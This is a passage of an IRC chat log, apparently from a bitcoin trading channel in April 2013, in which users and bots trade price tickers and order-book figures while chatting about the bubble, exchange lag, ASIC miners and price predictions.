13 14:06:27 64831.1719639 Apr 13 14:06:31 bleh Apr 13 14:10:09 lol at the stackoverflow link Apr 13 14:10:15 is that the bitcoin24 guy? Apr 13 14:13:09 !bids 0 Apr 13 14:13:45 [BTCTC] [GSDPT] 292 @ 0.00372 = 1.0862 BTC [+] Apr 13 14:21:11 Does BFL even give updates anymore? Apr 13 14:21:24 they just be mining away with everyone's units Apr 13 14:23:06 hashrate doesn't indicate that Apr 13 14:24:41 it does if they have been doing it for a month+ Apr 13 14:26:30 if you break down AM, all the AValons possible, and more than modest GPU estimates, I'm pretty sure it leaves room for one asic maker to be cheating Apr 13 14:30:59 relevant, http://organofcorti.blogspot.com/2013/04/121-pre-asic-network-hashrate.html Apr 13 14:32:01 [HAVELOCK] [HIM] 4 @ 1.42 = 5.68 BTC [+] Apr 13 14:32:21 thanks! Apr 13 14:32:37 [BTCTC] [ASICMINER-PT] 10 @ 0.809 = 8.09 BTC [+] Apr 13 14:32:54 [BTCTC] [ASICMINER-PT] 19 @ 0.81 = 15.39 BTC [+] Apr 13 14:33:43 [BTCTC] [ASICMINER-PT] 1 @ 0.815 BTC [+] Apr 13 14:33:48 [BTCTC] [ASICMINER-PT] 10 @ 0.815 = 8.15 BTC [+] Apr 13 14:36:32 [MPEX] [S.MPOE] 452 @ 0.00070132 = 0.317 BTC [-] Apr 13 14:36:35 [MPEX] [S.MPOE] 24050 @ 0.0006996 = 16.8254 BTC [-] Apr 13 14:36:37 [MPEX] [S.MPOE] 13490 @ 0.00069351 = 9.3554 BTC [-] Apr 13 14:36:49 [MPEX] [S.MPOE] 3508 @ 0.0006934 = 2.4324 BTC [-] Apr 13 14:41:05 so if i understand correctly, he's roughly proving that 80% of hashing is done by 20% of miners Apr 13 14:41:15 ;;nethash Apr 13 14:41:16 64831.1719639 Apr 13 14:41:40 ;;calc 64831.1719639*.8 Apr 13 14:41:41 51864.9375711 Apr 13 14:42:33 so 50000 os probably asic miners? Apr 13 14:42:58 he says he'll address this exact topic in his next post Apr 13 14:43:11 ;;bids 0 Apr 13 14:43:13 There are currently 44105322 bitcoins demanded at or over 0.0 USD, worth 14323183.9498 USD in total. | Data vintage: 0.0098 seconds Apr 13 14:43:24 actually no, he's gonna predict nethash Apr 13 14:44:37 meh i dunno, but I do suspect hashing is well above what AM and avalon claim to have shipped Apr 13 15:14:42 [MPEX] [S.MPOE] 10467 @ 0.0006934 = 7.2578 BTC [-] Apr 13 15:27:06 very very thin volume Apr 13 15:32:00 [HAVELOCK] [VTX] 3 @ 0.3874 = 1.1622 BTC [+] Apr 13 15:38:30 [BTCTC] [ASICMINER-PT] 6 @ 0.815 = 4.89 BTC [+] Apr 13 15:40:44 ;;bids 0 Apr 13 15:40:46 There are currently 44179884 bitcoins demanded at or over 0.0 USD, worth 14575523.3865 USD in total. | Data vintage: 0.0107 seconds Apr 13 15:46:20 ;;asks command Apr 13 15:46:20 Error: 'command' is not a valid floating point number. Apr 13 15:46:27 ;;asks 117 Apr 13 15:46:30 There are currently 160.93487 bitcoins offered at or under 117.0 USD, worth 18829.0146385 USD in total. | Data vintage: 0.0025 seconds Apr 13 15:46:39 ;;asks 230 Apr 13 15:46:40 There are currently 65454.517 bitcoins offered at or under 230.0 USD, worth 10675349.4797 USD in total. | Data vintage: 9.7170 seconds Apr 13 15:46:45 ;;asks 250 Apr 13 15:46:46 There are currently 79034.624 bitcoins offered at or under 250.0 USD, worth 14036918.2744 USD in total. | Data vintage: 15.5423 seconds Apr 13 15:46:51 ;;asks 260 Apr 13 15:46:52 There are currently 81140.686 bitcoins offered at or under 260.0 USD, worth 14577304.377 USD in total. | Data vintage: 21.7122 seconds Apr 13 16:02:37 [MPEX] [S.MPOE] 16400 @ 0.0007062 = 11.5817 BTC [+] Apr 13 16:02:40 [MPEX] [S.MPOE] 7450 @ 0.00070947 = 5.2856 BTC [+] Apr 13 16:04:00 [HAVELOCK] [HIM] 11 @ 1.5 = 16.5 BTC [+] Apr 13 16:13:00 [HAVELOCK] [VTX] 4 @ 0.36 = 1.44 BTC [-] Apr 13 16:18:59 [HAVELOCK] [HIM] 1 @ 1.55 BTC [+] Apr 13 16:25:24 [BTCTC] [S.DICE-PT] 30 @ 0.00465 = 0.1395 BTC [-] Apr 13 16:27:40 [BTCTC] [BTC-GOLD] 9 @ 0.0099 = 0.0891 BTC [-] Apr 13 16:27:59 [HAVELOCK] [HIM] 5 @ 1.55 = 7.75 BTC [+] Apr 13 16:33:37 [BTCTC] [GSDPT] 500 @ 0.00372 = 1.86 BTC [+] Apr 13 16:36:34 [BTCTC] [ASICMINER-PT] 1 @ 0.8149 BTC [-] Apr 13 16:45:07 !ticker m S.MPOE Apr 13 16:45:08 [MPEX:S.MPOE] 1D: 0.0006934 / 0.00070688 / 0.00073 (509269 shares, 359.99 BTC), 7D: 0.00063322 / 0.0006913 / 0.00073 (2255212 shares, 1,559.04 BTC), 30D: 0.00059218 / 0.00068895 / 0.00077505 (10436877 shares, 7,190.58 BTC) Apr 13 16:55:28 ;;bids 0 Apr 13 16:55:31 There are currently 44175268 bitcoins demanded at or over 0.0 USD, worth 14463026.2065 USD in total. | Data vintage: 0.0111 seconds Apr 13 17:08:47 here comes the relief price Apr 13 17:09:58 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Apr 13 17:10:27 mtgox keeps going down yea Apr 13 17:10:29 hilarious Apr 13 17:10:35 relief price? Apr 13 17:10:37 it was inevitable Apr 13 17:10:44 run up yesterday was to fast Apr 13 17:10:46 ;;ticker Apr 13 17:10:47 BTCUSD ticker | Best bid: 112.00000, Best ask: 112.12000, Bid-ask spread: 0.12000, Last trade: 112.12000, 24 hour volume: 366351.99823576, 24 hour low: 67.34453, 24 hour high: 130.00000, 24 hour vwap: 99.49012 Apr 13 17:10:48 yep Apr 13 17:10:48 too Apr 13 17:10:56 back under 100 we'll go Apr 13 17:10:59 yep Apr 13 17:11:15 getting ready for 50 Apr 13 17:11:16 it will be amplified by the weekend Apr 13 17:11:42 50 is the lowest possible, but i think there is enough money in gox to keep us from there Apr 13 17:12:00 everyonne that was going to get out would have done so already Apr 13 17:12:07 you never know Apr 13 17:12:19 if it makes a move downward people could panic again Apr 13 17:12:33 especially those who sold at 50 and bought back at 100 Apr 13 17:12:39 i sold 100 coins at 115-119 today :) Apr 13 17:12:43 the realtive upswing from the weekend might give them calm, unless there are some huge dumps. also at the curent price the whales that were able to obtain possitions in the market did so much higher and are not going to sell before we hit $180 again Apr 13 17:12:45 hmm yep Apr 13 17:12:49 bids up at 75-97 Apr 13 17:12:58 nice tat, thanks Apr 13 17:13:11 same ThickAsThieves :D made a mini trade Apr 13 17:13:29 from 110 to 120, was shooting for more but exited when momentum didnt come Apr 13 17:13:41 yeah at first i was going for 124 Apr 13 17:13:46 but then the charts shifted Apr 13 17:13:52 yeep Apr 13 17:14:21 there are some clear bots trading if you follow all +800btc buy and ask trades on the edge. the bot is shifting them around in predictable manner and actually the reason for the little hump/lull/hump/lull pattern Apr 13 17:15:05 bots will support any price that aggressive orders wanna create Apr 13 17:15:52 they dont need a big spread, but they will thank you for it Apr 13 17:15:59 oh yeah, clearly. just find it interesting to follow it as it oscillates on its own (likely buy and selling to itself at different weights depending if it is in the upswing state of its movement or downswing) Apr 13 17:16:15 i wonder if it will change once fees are added back Apr 13 17:17:53 here are two example whale bids: price:110 amount:999.92869578 edge:113..112.51 price:124.9999 amount:1200.001 Apr 13 17:18:18 as the market is swinging up the bot will slowly increase the volume on the bottom and reduce it on the top Apr 13 17:18:26 when the market goes down, it does the reverse Apr 13 17:18:38 not to absolute pattern but pretty close Apr 13 17:19:37 anyway, i plan to be sure im holding btc by weekend. Apr 13 17:25:00 [HAVELOCK] [HIM] 1 @ 1.55 BTC [+] Apr 13 17:32:25 ;;seen smickles Apr 13 17:32:25 smickles was last seen in #bitcoin-assets 1 week, 1 day, 22 hours, 49 minutes, and 53 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 13 17:48:31 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [-] Apr 13 17:48:50 [BTCTC] [ASICMINER-PT] 7 @ 0.815 = 5.705 BTC [+] Apr 13 17:50:58 [BTCTC] [ASICMINER-PT] 1 @ 0.815 BTC [+] Apr 13 17:51:12 [BTCTC] [ASICMINER-PT] 4 @ 0.815 = 3.26 BTC [+] Apr 13 17:57:43 ;;bids 0 Apr 13 17:57:46 There are currently 44149877 bitcoins demanded at or over 0.0 USD, worth 14732373.3823 USD in total. | Data vintage: 0.0101 seconds Apr 13 17:57:53 ;;asks 260 Apr 13 17:57:53 There are currently 86341.908 bitcoins offered at or under 260.0 USD, worth 15296908.2659 USD in total. | Data vintage: 7.1920 seconds Apr 13 17:58:02 ;;ticker Apr 13 17:58:04 BTCUSD ticker | Best bid: 114.92151, Best ask: 115.11900, Bid-ask spread: 0.19749, Last trade: 115.12000, 24 hour volume: 352548.16039366, 24 hour low: 67.34453, 24 hour high: 130.00000, 24 hour vwap: 100.83932 Apr 13 17:58:16 Have you guys seen the new USB ASICMiner ? lol Apr 13 17:58:42 Yeah, have they said anything about a price? Apr 13 17:58:49 urlpls Apr 13 17:58:51 ? Apr 13 17:58:53 $39 for board members Apr 13 17:59:04 $239 for public, if there are any left Apr 13 17:59:14 urlpls Apr 13 17:59:27 look kakobrekla just a sec Apr 13 17:59:33 [BTCTC] [BTC-BOND] 3 @ 0.0101 = 0.0303 BTC [+] Apr 13 17:59:39 :D Apr 13 18:00:34 heh, meant 'looking' Apr 13 18:00:37 https://bitcointalk.org/index.php?PHPSESSID=8i63dq38dk5vapvrptb22g4dl0&topic=99497.msg1819469#msg1819469 Apr 13 18:00:58 that price is not official Apr 13 18:01:03 afaik Apr 13 18:01:29 lmao Apr 13 18:01:44 so cute Apr 13 18:01:48 ya Apr 13 18:01:54 so little elec needed Apr 13 18:02:09 pretty dang cool, I think. Apr 13 18:02:22 but its a toy Apr 13 18:02:30 i'd love a usb hub with every port filled with one of these Apr 13 18:02:32 so Apr 13 18:02:36 is BFL a scam? Apr 13 18:02:36 like keyring btc miner Apr 13 18:02:38 or not Apr 13 18:02:41 works on solar Apr 13 18:02:43 n stuff Apr 13 18:02:52 yah, a toy for sure Apr 13 18:03:18 a toy, but if you had 10 of these, is that 3MH/s Apr 13 18:03:27 gh Apr 13 18:03:36 oh yeah, bitcoin mining Apr 13 18:03:39 ya but 3gh whats that today Apr 13 18:03:44 5 chinese do that manually Apr 13 18:04:01 that today my friend is 5-6 7970's Apr 13 18:04:04 i see it as the conumer's miner Apr 13 18:04:11 anyone here use the socket.io inteface for gox in their own scripts? if so what lib do you use. i find the python stuff doesnt support the https://, only wss: and then horribly at that, and nodejs seems to be a bit buggy. anyone have some experiance Apr 13 18:04:14 every get one to support the network Apr 13 18:04:33 totally Apr 13 18:04:40 I would get 30 just in case Apr 13 18:04:53 gesell: try goxtool, http://prof7bit.github.com/goxtool/ Apr 13 18:05:10 9-10Gh/s Apr 13 18:05:10 then later on AM can introduce a PCI card Apr 13 18:05:19 but everything websocket is really unstable right now so that's a bummer Apr 13 18:05:22 dunno, maybe its worth 100$ if i had it today Apr 13 18:05:26 oooh, a PCI card Apr 13 18:05:38 traub checking it out thanks Apr 13 18:05:39 or even a eSATA or Thunderbolt card Apr 13 18:05:40 wow Apr 13 18:06:16 i dont think those formats would work for mining, but thats out of my area Apr 13 18:06:33 ;-) Apr 13 18:06:40 i was just fooling Apr 13 18:07:22 BFL is such a scam at this point Apr 13 18:07:38 no news in like 2 weeks? Apr 13 18:07:46 busy mining Apr 13 18:08:35 [BTCTC] [ASICMINER-PT] 1 @ 0.78101 BTC [-] Apr 13 18:08:37 [BTCTC] [ASICMINER-PT] 1 @ 0.781 BTC [-] Apr 13 18:08:40 [BTCTC] [ASICMINER-PT] 2 @ 0.78001 = 1.56 BTC [-] Apr 13 18:08:43 [BTCTC] [ASICMINER-PT] 10 @ 0.78 = 7.8 BTC [-] Apr 13 18:08:46 [BTCTC] [ASICMINER-PT] 5 @ 0.78 = 3.9 BTC [-] Apr 13 18:09:06 whats up lipppOpppopp Apr 13 18:09:50 - means sell or buy? Apr 13 18:15:03 [BTCTC] [S.BBET-PT] 1 @ 0.00223 BTC [+] Apr 13 18:20:04 bugpoweder Apr 13 18:20:12 bugpowder Apr 13 18:24:39 [BTCTC] [ASICMINER-PT] 1 @ 0.815 BTC [+] Apr 13 18:25:24 [BTCTC] [ASICMINER-PT] 1 @ 0.82 BTC [+] Apr 13 18:26:57 [BTCTC] [ASICMINER-PT] 2 @ 0.79 = 1.58 BTC [-] Apr 13 18:27:07 [BTCTC] [ASICMINER-PT] 4 @ 0.82 = 3.28 BTC [+] Apr 13 18:27:09 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Apr 13 18:27:46 Bugpowder isn't here Apr 13 18:29:27 what's up KRS1 Apr 13 18:29:44 [BTCTC] [ASICMINER-PT] 2 @ 0.8229 = 1.6458 BTC [+] Apr 13 18:29:48 hey ThickAsThieves, yeah BFL is a scam, but seriously, they're too busy 'shipping' to update with news Apr 13 18:29:59 [BTCTC] [ASICMINER-PT] 6 @ 0.82296 = 4.9378 BTC [+] Apr 13 18:30:03 go go AM Apr 13 18:30:05 and by seriously, I meant sarcastically Apr 13 18:30:32 gonna need some shares in ASICMINER Apr 13 18:30:35 [BTCTC] [ASICMINER-PT] 1 @ 0.82297 BTC [+] Apr 13 18:30:42 that's about to take off on the 22nd Apr 13 18:33:58 [HAVELOCK] [KCIM] 1 @ 1.15 BTC [+] Apr 13 18:34:59 [HAVELOCK] [KCIM] 3 @ 1.16 = 3.48 BTC [+] Apr 13 18:38:54 Has anyone spoked with smickles in the past 7 days? Apr 13 18:39:27 mircea_popescu, would you ever host a passthru on mpex? Apr 13 18:40:08 mircea is not here Apr 13 18:40:14 And his answer is easy Apr 13 18:40:24 ;;eightball would mircea host a passthru? Apr 13 18:40:25 No clue. Apr 13 18:40:30 :P Apr 13 18:43:55 ;;eightball will smickles ever wire me my money? Apr 13 18:43:55 Naturally. Apr 13 18:49:59 [HAVELOCK] [VTX] 10 @ 0.36 = 3.6 BTC [-] Apr 13 18:51:04 faaaaal chickun Apr 13 18:52:47 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [-] Apr 13 18:56:57 still supsect mtgox is trying to manipulate prices Apr 13 18:57:09 by shutting down websocket etc Apr 13 18:57:39 it essentially shuts down trading as nobody wants to go in blind Apr 13 18:57:59 [HAVELOCK] [VTX] 5 @ 0.36 = 1.8 BTC [-] Apr 13 18:58:01 [HAVELOCK] [VTX] 4 @ 0.355 = 1.42 BTC [-] Apr 13 18:58:01 [HAVELOCK] [VTX] 1 @ 0.35 BTC [-] Apr 13 18:58:04 trading is awfully slow today Apr 13 18:58:43 i know i do all mine elsewhere now Apr 13 18:58:55 want to throw an alka-seltzer in this btch Apr 13 19:01:26 [MPEX] [S.MPOE] 5500 @ 0.00071373 = 3.9255 BTC [+] Apr 13 19:07:02 ;;nethash Apr 13 19:07:03 64757.3657893 Apr 13 19:10:58 [HAVELOCK] [HIM] 12 @ 1.55 = 18.6 BTC [+] Apr 13 19:22:47 ;;asks 260 Apr 13 19:22:57 There are currently 86097.171 bitcoins offered at or under 260.0 USD, worth 15264939.1644 USD in total. | Data vintage: 1762.8584 seconds Apr 13 19:23:14 ;;asks 999999999 Apr 13 19:23:16 There are currently 113551.78 bitcoins offered at or under 999999999.0 USD, worth 3912556192.17 USD in total. | Data vintage: 0.0053 seconds Apr 13 19:25:20 ;;ticker Apr 13 19:25:20 BTCUSD ticker | Best bid: 113.62900, Best ask: 113.90000, Bid-ask spread: 0.27100, Last trade: 114.00000, 24 hour volume: 328435.43002459, 24 hour low: 72.00000, 24 hour high: 130.00000, 24 hour vwap: 103.76695 Apr 13 19:25:43 ;;market --sell 2500 Apr 13 19:25:44 A market order to sell 2500 bitcoins right now would net 281341.5471 USD and would take the last price down to 111.0000 USD, resulting in an average price of 112.5366 USD/BTC. | Data vintage: 0.0001 seconds Apr 13 19:25:53 ;;market --sell 5000 Apr 13 19:25:54 A market order to sell 5000 bitcoins right now would net 554724.9412 USD and would take the last price down to 108.0000 USD, resulting in an average price of 110.9450 USD/BTC. | Data vintage: 9.1154 seconds Apr 13 19:27:09 oh 113 Apr 13 19:28:01 [MPEX] [S.MPOE] 6650 @ 0.00072407 = 4.8151 BTC [+] Apr 13 19:33:10 [MPEX] [S.MPOE] 650 @ 0.00072407 = 0.4706 BTC [+] Apr 13 19:33:13 [MPEX] [S.MPOE] 1767 @ 0.00072947 = 1.289 BTC [+] Apr 13 19:38:00 [HAVELOCK] [SDICE] 2 @ 0.35 = 0.7 BTC [+] Apr 13 19:38:18 ;;ticker Apr 13 19:38:28 Error: Failure to retrieve ticker. Try again later. Apr 13 19:44:59 [HAVELOCK] [HIM] 2 @ 1.55 = 3.1 BTC [+] Apr 13 19:45:48 [BTCTC] [ASICMINER-PT] 2 @ 0.799999 = 1.6 BTC [-] Apr 13 19:48:44 ;;ticker Apr 13 19:48:45 BTCUSD ticker | Best bid: 114.40000, Best ask: 114.50000, Bid-ask spread: 0.10000, Last trade: 114.40000, 24 hour volume: 327494.64898141, 24 hour low: 72.00000, 24 hour high: 130.00000, 24 hour vwap: 104.27416 Apr 13 19:48:54 !ticker m ^OIX Apr 13 19:48:54 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 115.60031166 / 219.37944037 / 226.19553589 (13844 shares, 2,468.31 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 13 19:49:15 ;;seen mircea_popescu Apr 13 19:49:15 mircea_popescu was last seen in #bitcoin-assets 7 hours, 5 minutes, and 1 second ago: he delivered a link to mtgox_db.exe, which obviously. Apr 13 20:01:30 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [+] Apr 13 20:04:37 !ticker h HIM Apr 13 20:04:39 [HAVELOCK:HIM] 1D: 1.42000000 / 1.52027778 / 1.55000000 (36 shares, 54.73000000 BTC), 7D: 0.75000001 / 1.44240166 / 1.93000000 (301 shares, 434.16290011 BTC), 30D: 0.75000001 / 1.72171064 / 2.08000000 (818 shares, 1408.35930041 BTC) Apr 13 20:13:52 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Apr 13 20:15:58 [HAVELOCK] [SDICE] 1 @ 0.33775 BTC [-] Apr 13 20:15:59 [HAVELOCK] [SDICE] 14 @ 0.33500001 = 4.69 BTC [-] Apr 13 20:21:25 [BTCTC] [ASICMINER-PT] 1 @ 0.7951 BTC [-] Apr 13 20:21:37 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [-] Apr 13 20:21:38 [MPEX] [S.MPOE] 5000 @ 0.000728 = 3.64 BTC [-] Apr 13 20:21:40 This is why I am cashing out 67% Apr 13 20:21:42 http://i.imgur.com/fZwy3xd.png Apr 13 20:22:36 Bug I don't know if that's fair Apr 13 20:22:44 conditions are not the same at all Apr 13 20:22:47 Where do you think the bull trap will top out? Apr 13 20:22:57 bitcoin has hype Apr 13 20:23:03 back then it didnt Apr 13 20:23:07 way less users Apr 13 20:23:10 ThickAsThieves: It had hype back then Apr 13 20:23:18 The valuation is 10x now than then Apr 13 20:23:41 Clearly it is the most simplistic of analyses Apr 13 20:23:47 comparing two charts Apr 13 20:23:56 I agree that "it's different this time" as far as hype levels go, but bubble after bubble, asset class after asset class, the same sort of curves play out on the charts. Apr 13 20:24:00 But I think the risk level is off the charts right now Apr 13 20:24:16 And it's too expensive to buy options to mitigate that risk Apr 13 20:24:27 up Apr 13 20:24:28 yup Apr 13 20:24:53 And the volatility in the price actually makes it more profitable just to trade the swings Apr 13 20:24:55 i'm about as out as i can be anyway, unless i crash the stocks market for some assets... Apr 13 20:25:00 with cash in and out Apr 13 20:25:21 Made some very very good trades yesterady Apr 13 20:25:32 didn't get the bottom but got the top Apr 13 20:25:48 same here Apr 13 20:25:50 These oscillations are like clockwork. I guess we have bots to thank for that? Apr 13 20:25:58 my most recent outs were just under 120 Apr 13 20:26:12 but i do have bids up sub-100 Apr 13 20:26:18 not a lot Apr 13 20:26:20 but enough Apr 13 20:27:07 demand is totally different now Apr 13 20:27:17 as wella s other things Apr 13 20:28:02 we have more businesses, easier ways to use coins, way more mining foundation Apr 13 20:28:03 I'm going to look at reentry at 30. Apr 13 20:28:27 Still keeping a ton of money in coins Apr 13 20:28:36 [MPEX] [S.MPOE] 9881 @ 0.0007222 = 7.1361 BTC [-] Apr 13 20:28:54 i dont think youll see 30 Apr 13 20:29:12 not without bad enough news that youll change your mind Apr 13 20:30:13 I think we hover for a while Apr 13 20:30:15 and fade down Apr 13 20:30:16 [MPEX] [S.MPOE] 9600 @ 0.00070662 = 6.7836 BTC [-] Apr 13 20:30:21 slowly over a few months Apr 13 20:30:42 to the level that actual economic activity supports ($30) Apr 13 20:30:54 and then I will move in strongly Apr 13 20:31:01 and ride the next hype cycle Apr 13 20:31:07 for another 100x gain. Apr 13 20:31:13 I'm sure you've all seen this chart umpteen times but this one has a nice blue circle at the relevant point http://jamesgoodeonthemoney.blogspot.ca/2010/10/uk-property-prices-post-record-drop-as.html (the chart applies to all asset bubbles, not just real estate or BTC) Apr 13 20:36:08 bugpowder, wath about 150K new account on Mt Gox since march ? Apr 13 20:36:58 [BTCTC] [S.BBET-PT] 5 @ 0.00223 = 0.0112 BTC [+] Apr 13 20:38:51 everyone wants BTC Apr 13 20:38:52 sure Apr 13 20:38:55 the only bubble start on april 100 to 262 in just 10 days Apr 13 20:39:01 but everyone wants a good deal Apr 13 20:39:06 The bubble started at $!5. Apr 13 20:39:07 $!5 Apr 13 20:39:10 $15 Apr 13 20:39:27 it was a steady ramp from there Apr 13 20:40:14 Look at the Log scale Apr 13 20:40:24 bubbles pop into oblivion, this one is sticking around like the air after a good bowl movement Apr 13 20:40:38 bowel Apr 13 20:40:41 linear ramp from Jan 15th, no pullbacks at all, then a sharper angle after cyprus, mar 15th Apr 13 20:40:48 oh heh lol yep..not the kind u smoke Apr 13 20:40:49 it might pop next week again :P Apr 13 20:40:54 Sure Apr 13 20:40:55 i do agree with Bug that the air will be let out for real soon Apr 13 20:40:55 it totally Apr 13 20:40:59 might Apr 13 20:41:05 i just dont think the lull will be typical Apr 13 20:41:07 hmmm it seems to be that time again Apr 13 20:41:31 Bug Apr 13 20:41:43 I just think we haven't seen the return to a realistic valuation yet, and after a bubble pops, you will usually end up with an undershoot of value Apr 13 20:41:49 It seems you finally made money on put bets Apr 13 20:41:55 once full capitulation takes place Apr 13 20:42:02 No, mircera canceled my puts Apr 13 20:42:11 didn't make any money Apr 13 20:42:13 So he robbed yo ass Apr 13 20:42:15 Lol Apr 13 20:42:18 I don't want to go into it any more Apr 13 20:42:27 tiberius, please... Apr 13 20:42:29 mircea still alive? Apr 13 20:42:45 Made a ton day trading these bounces though. Apr 13 20:42:57 Bugpowder you mtgox verified? Apr 13 20:43:02 how in the hell can u trade during those lag times? i cant Apr 13 20:43:04 hey there! Is there a homepage that shows charts of different btc markets compared? Apr 13 20:43:05 I'll play the options game again once the bot pricing gets normalized Apr 13 20:43:09 Yes I'm verified Apr 13 20:43:13 not trusted yet though Apr 13 20:43:19 thinking of getting trusted Apr 13 20:43:31 but maybe coinlab will make that irrelevant Apr 13 20:43:36 Apr 13 20:43:44 but I have zero confidence in them Apr 13 20:43:49 Bugpowder i think btc markets move faster than traditional markets because there is 0 enforced downtime Apr 13 20:44:17 Many people lived wealthily with the bubble even for a day Apr 13 20:44:30 I bought an ipad for 1.2 btc Apr 13 20:44:33 Lol Apr 13 20:44:35 capitulation..we gonna dive next week i think Apr 13 20:44:54 i think we rise and then dive :> Apr 13 20:45:15 wasnt the rise from ~$70-$80 to current m.p.? Apr 13 20:45:30 how can i buy some of those short bets Apr 13 20:46:05 lol Apr 13 20:46:10 Short puts? Apr 13 20:46:13 Or short calls? Apr 13 20:46:16 can't buy puts now Apr 13 20:46:18 way too expensive Apr 13 20:46:34 it's all a little pricey. Apr 13 20:46:40 Sell the bot options then lol Apr 13 20:46:45 nope Apr 13 20:46:52 bot buying price hasn't increased Apr 13 20:46:56 ;;ticker Apr 13 20:46:57 BTCUSD ticker | Best bid: 114.15000, Best ask: 114.34000, Bid-ask spread: 0.19000, Last trade: 114.34000, 24 hour volume: 320023.28590435, 24 hour low: 72.50000, 24 hour high: 130.00000, 24 hour vwap: 105.40869 Apr 13 20:46:57 only the selling price Apr 13 20:47:13 The volume is dropping rapidly Apr 13 20:47:19 Guest96001: Its the weekend Apr 13 20:47:30 volume is always light on Sat night Sunday morning Apr 13 20:47:37 Yes, but wednesday was like 1929 all over again Apr 13 20:47:44 or 2011 Apr 13 20:47:48 :) Apr 13 20:47:52 2011 took several days iirc Apr 13 20:48:08 I bought in at 16 went up to 30 and crashed Apr 13 20:48:17 http://i.imgur.com/fZwy3xd.png Apr 13 20:48:27 wow you were an early investor Apr 13 20:48:35 I wan't to get in at $7 back then Apr 13 20:48:39 and was pissed I missed out Apr 13 20:48:42 then happy Apr 13 20:48:47 then it hit $2 Apr 13 20:48:54 and I was like… MUST BUY NOWWWWW Apr 13 20:49:22 gotta go get some coffee to cure my hangover Apr 13 20:49:33 hey there! Is there a homepage that shows charts of different btc markets compared? Apr 13 20:49:38 Looking at my mtgox account balance is a pretty nice cure though :) Apr 13 20:49:53 http://bitcoincharts.com/markets/ Apr 13 20:49:56 B0g4r7: Apr 13 20:49:58 you'll be withdrawing money for months Apr 13 20:50:01 oops b0n1 Apr 13 20:50:17 ThickAsThieves: yah, unless it hits 30 Apr 13 20:50:23 and 20 Apr 13 20:50:25 true Apr 13 20:50:25 and 15 Apr 13 20:50:25 Bugpowder, on bitcoincharts you cant for example display 3 markets in one charts Apr 13 20:50:36 I don't know a site that has an overlay Apr 13 20:50:57 jurov had a link to one that does that i think Apr 13 20:51:00 or kakobrekla Apr 13 20:51:18 yeah i was told i should ask here Apr 13 20:52:43 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 13 20:54:00 nice Apr 13 20:54:07 reddit likes it! http://www.reddit.com/r/Bitcoin/comments/1c9zbb/anatomy_of_two_bitcoin_bubbles/ Apr 13 20:54:29 NICE kakobrekla Apr 13 20:54:36 is that dynamically updating? Apr 13 20:54:41 bookmarked. Apr 13 20:55:13 yes Apr 13 20:58:21 if you look at those bubble charts Apr 13 20:58:26 thanks kakobrekla Apr 13 20:58:30 it could be argued that we are further along Apr 13 20:58:41 do you have also one for other markets? Apr 13 20:58:45 due to compressed time action compared to 2011 Apr 13 20:58:49 or special markets like mtgoxEUR Apr 13 20:59:00 BTCUSD ticker | Best bid: 110.00000, Best ask: 111.00000, Bid-ask spread: 1.00000, Last trade: 110.00000, 24 hour volume: 319889.06631344, 24 hour low: 75.00001, 24 hour high: 130.00000, 24 hour vwap: 105.91656 Apr 13 21:00:27 bid walls disappearing Apr 13 21:00:29 yuss Apr 13 21:00:51 that reddit post spooked the market. LOL Apr 13 21:01:00 [MPEX] [S.MPOE] 10900 @ 0.00070377 = 7.6711 BTC [-] Apr 13 21:01:37 What reddit post_? Apr 13 21:01:45 there are a lot of angry people over bitinstant.... Apr 13 21:01:54 timberrrrrrr Apr 13 21:02:17 dodge the knife! Apr 13 21:03:21 tanking again? Apr 13 21:05:10 support from 100 and up went from 12000 coins to 8000 in the past hour Apr 13 21:06:09 ;;bids 100 Apr 13 21:06:09 There are currently 8085.5564 bitcoins demanded at or over 100.0 USD, worth 839838.49838 USD in total. | Data vintage: 22.0640 seconds Apr 13 21:06:30 plus 2000 new coins for sale in that time Apr 13 21:06:43 ;;bids 55 Apr 13 21:06:43 There are currently 80671.093 bitcoins demanded at or over 55.0 USD, worth 6123830.3584 USD in total. | Data vintage: 55.9154 seconds Apr 13 21:07:18 support will drop to 95 soon, then 80 Apr 13 21:07:43 Thi Apr 13 21:07:52 ;;ticker Apr 13 21:07:52 BTCUSD ticker | Best bid: 109.50946, Best ask: 110.00000, Bid-ask spread: 0.49054, Last trade: 110.00000, 24 hour volume: 319578.01377036, 24 hour low: 75.32006, 24 hour high: 130.00000, 24 hour vwap: 106.03518 Apr 13 21:07:54 short then Apr 13 21:07:54 ThickAsThieves: why? Apr 13 21:08:10 hehe you need to be a lil more specific Apr 13 21:08:41 watch the walls Apr 13 21:08:48 and query gribble Apr 13 21:08:54 ;;goxlag Apr 13 21:08:55 MtGox lag is 568.703018 seconds. During this time, light travels 1.13967448056 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 13 21:09:00 50x faster engine hard at work Apr 13 21:09:02 wow Apr 13 21:09:11 its going down now i guess Apr 13 21:09:47 yeh Apr 13 21:09:50 kinda scary :P Apr 13 21:10:07 That'd be my guess too, Thieves. In the last several days, have we had a single instance of lag spiking to the minutes which has resulted in an upturn? Apr 13 21:10:42 i think upturn during lag happened like once Apr 13 21:11:46 ;;ticker Apr 13 21:11:47 BTCUSD ticker | Best bid: 109.77000, Best ask: 110.00000, Bid-ask spread: 0.23000, Last trade: 110.00000, 24 hour volume: 319361.59253106, 24 hour low: 75.32006, 24 hour high: 130.00000, 24 hour vwap: 106.05848 Apr 13 21:11:48 feel bad for thos people making buys at 110 Apr 13 21:11:55 [BTCTC] [BITVPS] 10 @ 0.0006 = 0.006 BTC [+] Apr 13 21:12:03 [BTCTC] [BITVPS] 1 @ 0.00077 BTC [+] Apr 13 21:12:04 alright guys hold onto your hats Apr 13 21:12:16 [BTCTC] [BITVPS] 10 @ 0.001 = 0.01 BTC [+] Apr 13 21:12:20 [BTCTC] [BITVPS] 10 @ 0.002 = 0.02 